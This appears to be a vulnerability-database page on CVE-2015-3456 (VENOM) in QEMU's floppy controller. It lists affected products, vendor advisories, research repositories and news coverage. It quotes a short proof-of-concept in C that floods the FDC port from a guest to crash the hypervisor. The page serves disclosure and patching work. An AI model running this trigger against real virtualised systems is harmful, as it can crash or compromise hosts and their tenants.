Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.7
CVSSv2

CVE-2015-3456

Published: 13/05/2015 Updated: 07/11/2023
CVSS v2 Base Score: 7.7 | Impact Score: 10 | Exploitability Score: 5.1
VMScore: 776
Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
Subscribe to Qemu

Vulnerability Summary

The Floppy Disk Controller (FDC) in QEMU, as used in Xen 4.5.x and previous versions and KVM, allows local guest users to cause a denial of service (out-of-bounds write and guest crash) or possibly execute arbitrary code via the (1) FD_CMD_READ_ID, (2) FD_CMD_DRIVE_SPECIFICATION_COMMAND, or other unspecified commands, aka VENOM.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

qemu qemu

redhat openstack 4.0

redhat enterprise linux 7.0

redhat enterprise linux 6.0

redhat openstack 5.0

redhat openstack 7.0

redhat enterprise virtualization 3.0

redhat enterprise linux 5

xen xen 4.5.0

redhat openstack 6.0

Vendor Advisories

Ubuntu Security Notice: qemu, qemu-kvm vulnerabilities
Several security issues were fixed in QEMU ...
Debian CVElist Bug Report Logs: virtualbox: CVE-2015-3456: floppy driver host code execution
Debian Bug report logs - #785424 virtualbox: CVE-2015-3456: floppy driver host code execution Package: src:virtualbox; Maintainer for src:virtualbox is Debian Virtualbox Team <team+debian-virtualbox@trackerdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Sat, 16 May 2015 03:57:02 UTC Severity ...
Debian CVElist Bug Report Logs: qemu: CVE-2014-9718 CVE-2015-1779
Debian Bug report logs - #781250 qemu: CVE-2014-9718 CVE-2015-1779 Package: src:qemu; Maintainer for src:qemu is Debian QEMU Team <pkg-qemu-devel@listsaliothdebianorg>; Reported by: Moritz Muehlenhoff <jmm@debianorg> Date: Thu, 26 Mar 2015 13:48:13 UTC Severity: important Tags: confirmed, security, upstream Fixe ...
Debian Security Advisories: DSA-3262-1 xen -- security update
Jason Geffner discovered a buffer overflow in the emulated floppy disk drive, resulting in the potential execution of arbitrary code This only affects HVM guests For the oldstable distribution (wheezy), this problem has been fixed in version 414-3+deb7u6 The stable distribution (jessie) is already fixed through the qemu update provided as DSA- ...
Debian Security Advisories: DSA-3274-1 virtualbox -- security update
Jason Geffner discovered a buffer overflow in the emulated floppy disk drive, resulting in potential privilege escalation For the oldstable distribution (wheezy), this problem has been fixed in version 4118-dfsg-2+deb7u5 For the stable distribution (jessie), this problem has been fixed in version 4318-dfsg-3+deb8u2 For the unstable distribut ...
Debian Security Advisories: DSA-3259-1 qemu -- security update
Several vulnerabilities were discovered in the qemu virtualisation solution: CVE-2014-9718 It was discovered that the IDE controller emulation is susceptible to denial of service CVE-2015-1779 Daniel P Berrange discovered a denial of service vulnerability in the VNC web socket decoder CVE-2015-2756 Jan Beulich discovered tha ...

Exploits

Exploit DB: QEMU - Floppy Disk Controller (FDC) (PoC)
// Source: marcinfo/?l=oss-security&m=143155206320935&w=2 #include <sys/ioh> #define FIFO 0x3f5 int main() { int i; iopl(3); outb(0x0a,0x3f5); /* READ ID */ for (i=0;i<10000000;i++) outb(0x42,0x3f5); /* push */ } ...

Github Repositories

https://github.com/vincentbernat/cve-2015-3456

Experiments related to CVE-2015-3456

Experiments related to CVE-2015-3456 There is: exploit/ is an "exploit" (it just crashes QEMU) mock/ contains a stripped down version of QEMU Only the vulnerability remains patch/ contains a program to patch a running instance of QEMU The main point is to not need debug symbols, nor the original executable on disk Therefore, some information have to be provided

https://github.com/igorkraft/codestore

just some code fragments

TODO githubcom/adam-p/markdown-here/wiki/Markdown-Cheatsheet githubcom/github/linguist/blob/master/lib/linguist/languagesyml (highlighting languages) WebDAV und Internet weiterleiten testen (python-webdav installieren) wwwjavacinfo/closures-v05html mal lesen wwwscheissewasschenkichmuttide/ dewikipediaorg/wiki/Owncloud ww

https://github.com/takuzoo3868/laputa

Vuls検証環境

laputa なんぞこれ laputa は vuls の機能をお試しで検証するDocker環境です. 様々なOSをセットアップします. centos 7,8 debian 10 ubuntu 18 本来はvulsctlを使うと大変便利ですが vuls を開発しながら使うことを想定しているので 各ツールは make install でローカル環境に導入しています. また,

https://github.com/cyberlifetech/elysiumVM

Fixing Security of VM

elysiumVM Fixing Security of VM Playing against VENOM rootkit on VMs Take a look at these security bugs:cvemitreorg/cgi-bin/cvenamecgi?name=CVE-2015-3456 Problem: Floppy Disk Buffer - yep 30-year-old tech is back It's going to take a while More Info: venomcrowdstrikecom/ securitystackexchangecom/questions/3056/how-secure-are-virtual-mach

https://github.com/RUB-SysSec/Hypercube

NDSS 2020 - HYPER-CUBE: High-Dimensional Hypervisor Fuzzing

HYPER-CUBE: High-Dimensional Hypervisor Fuzzing Hyper-Cube is a black-box fuzzer designed specifically to test x86 hypervisors Our approach is based on a custom operating system that implements a custom bytecode interpreter to enable fuzzing of emulated hypervisor components The OS is tailored to work with most x86 hypervisors that support either BIOS or 32-bit UEFI boot

Recent Articles

Miscreants tripled output of proof of concept exploits in 2015
The Register • John Leyden • 05 May 2016

Pastebin is for old hats. Cool black hats use Twitter now

Hackers collectively tripled the production of Proof-of-Concept exploits last year, according to a new study out on Thursday. Researchers and black hats develop proof-of-concept (PoC) exploits for research or demonstration purposes. These PoCs are developed for a various reasons – to demonstrate that software is vulnerable, force a company to develop a critical patch, showcase skills, or, in the most malicious cases, claim ownership of a working exploit that can run on real-world targets. More...

Read more...
Oracle releases antidote for VENOM vulnerability
The Register • Darren Pauli • 19 May 2015

Patch but don't panic

Oracle has released patches for its virtualisation software to crimp the VENOM vulnerability that allows attackers to break out of virtual machines to attack hosts. The company follows a host of others including KVM and Xen which have patched the buffer overflow bug. VMware, Microsoft, and Bochs are immune to the problem. Researcher Jason Geffner of threat intelligence outfit Crowdstrike quietly tipped off vendors including Oracle to VENOM (Virtualised Environment Neglected Operations Manipulati...

Read more...
VENOM virtual vuln proves less poisonous than first feared
The Register • John Leyden • 14 May 2015

Potential deleterious effects more like a snakebite* than a snake bite

Analysis A newly discovered vulnerability in many popular virtual machine platforms is serious, but nowhere near as bad as last year’s Heartbleed vulnerability, according to security experts. Dubbed VENOM (Virtualized Environment Neglected Operations Manipulation), the zero-day flaw takes advantage of the “virtual floppy disk controller” and potentially allows attackers to escape out of the virtual machine and execute malicious code on its host. CrowdStrike, the security intelligence firm ...

Read more...

References

CWE-119http://rhn.redhat.com/errata/RHSA-2015-1002.htmlhttp://rhn.redhat.com/errata/RHSA-2015-1000.htmlhttp://rhn.redhat.com/errata/RHSA-2015-0999.htmlhttp://rhn.redhat.com/errata/RHSA-2015-0998.htmlhttp://xenbits.xen.org/xsa/advisory-133.htmlhttp://rhn.redhat.com/errata/RHSA-2015-1001.htmlhttps://access.redhat.com/articles/1444903http://rhn.redhat.com/errata/RHSA-2015-1003.htmlhttps://securityblog.redhat.com/2015/05/13/venom-dont-get-bitten/http://venom.crowdstrike.com/http://rhn.redhat.com/errata/RHSA-2015-1004.htmlhttps://www.suse.com/security/cve/CVE-2015-3456.htmlhttp://lists.opensuse.org/opensuse-security-announce/2015-05/msg00021.htmlhttp://www.debian.org/security/2015/dsa-3274http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00019.htmlhttp://marc.info/?l=bugtraq&m=143229451215900&w=2http://www.securityfocus.com/bid/74640https://kc.mcafee.com/corporate/index?page=content&id=SB10118http://lists.fedoraproject.org/pipermail/package-announce/2015-May/158072.htmlhttp://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.htmlhttp://www.debian.org/security/2015/dsa-3259http://www.ubuntu.com/usn/USN-2608-1http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00042.htmlhttps://support.lenovo.com/us/en/product_security/venomhttp://marc.info/?l=bugtraq&m=143387998230996&w=2http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-438937.htmhttp://kb.juniper.net/InfoCenter/index?page=content&id=JSA10693https://bto.bluecoat.com/security-advisory/sa95http://www.fortiguard.com/advisory/2015-05-19-cve-2015-3456-venom-vulnerabilityhttp://support.citrix.com/article/CTX201078http://lists.opensuse.org/opensuse-updates/2015-08/msg00021.htmlhttps://www.exploit-db.com/exploits/37053/http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00001.htmlhttp://www.securitytracker.com/id/1032311http://www.securitytracker.com/id/1032306http://www.debian.org/security/2015/dsa-3262http://rhn.redhat.com/errata/RHSA-2015-1011.htmlhttp://lists.opensuse.org/opensuse-security-announce/2015-05/msg00018.htmlhttp://lists.opensuse.org/opensuse-security-announce/2015-05/msg00014.htmlhttp://lists.opensuse.org/opensuse-security-announce/2015-05/msg00013.htmlhttp://lists.opensuse.org/opensuse-security-announce/2015-05/msg00009.htmlhttps://kb.juniper.net/JSA10783https://security.gentoo.org/glsa/201612-27https://security.gentoo.org/glsa/201604-03https://security.gentoo.org/glsa/201602-01http://www.securitytracker.com/id/1032917https://www.arista.com/en/support/advisories-notices/security-advisories/1128-security-advisory-10http://git.qemu.org/?p=qemu.git%3Ba=commitdiff%3Bh=e907746266721f305d67bc0718795fedee2e824chttps://usn.ubuntu.com/2608-1/https://nvd.nist.govhttps://www.exploit-db.com/exploits/37053/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-4040privilege escalationCVE-2024-4112CVE-2024-32872man-in-the-middleCVE-2024-32788bypassCVE-2024-3400CVE-2024-28976
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook